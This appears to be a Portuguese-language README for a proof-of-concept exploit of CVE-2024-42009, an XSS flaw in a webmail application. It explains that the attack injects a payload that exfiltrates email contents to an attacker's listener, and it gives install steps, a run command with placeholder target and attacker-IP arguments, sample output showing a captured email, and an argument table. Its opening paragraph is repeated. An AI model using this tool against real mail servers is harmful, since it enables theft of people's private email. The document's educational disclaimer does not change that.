
Esta Prova de Conceito (PoC) demonstra um exploit para o CVE-2024-42009, aproveitando uma vulnerabilidade de cross-site scripting (XSS) para extrair e-mails de um aplicativo de webmail alvo. O ataque injeta um payload malicioso que exfiltra o conteúdo dos e-mails para um listener controlado pelo atacante.
Esta Prova de Conceito (PoC) demonstra um exploit para o CVE-2024-42009, aproveitando uma vulnerabilidade de cross-site scripting (XSS) para extrair e-mails de uma aplicação de webmail alvo. O ataque injeta um payload malicioso que exfiltra o conteúdo do e-mail para um listener controlado pelo atacante.
pip install requests beautifulsoup4
Execute o script com os argumentos necessários:
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)
[+] Captured Email Content:
Hello, this is a test email!
Não reivindico crédito/propriedade/divulgação da vulnerabilidade e de todos os exploits correspondentes hospedados neste repositório GitHub - Todos os créditos ao pesquisador que a descobriu; apenas criei um POC para replicar a vulnerabilidade com base nos dados da internet. Este PoC é apenas para fins educacionais e de pesquisa. Testes não autorizados contra sistemas sem consentimento são ilegais. Use com responsabilidade!
| Argument | Description |
|---|
-fu, --from-user | O endereço de e-mail do remetente |
-tu, --to-user | O endereço de e-mail do destinatário |
-u, --target-url | A URL do webmail alvo |
-ip, --server-ip | O endereço IP do listener do atacante |
-p, --server-port | A porta para o listener (padrão: 1337) |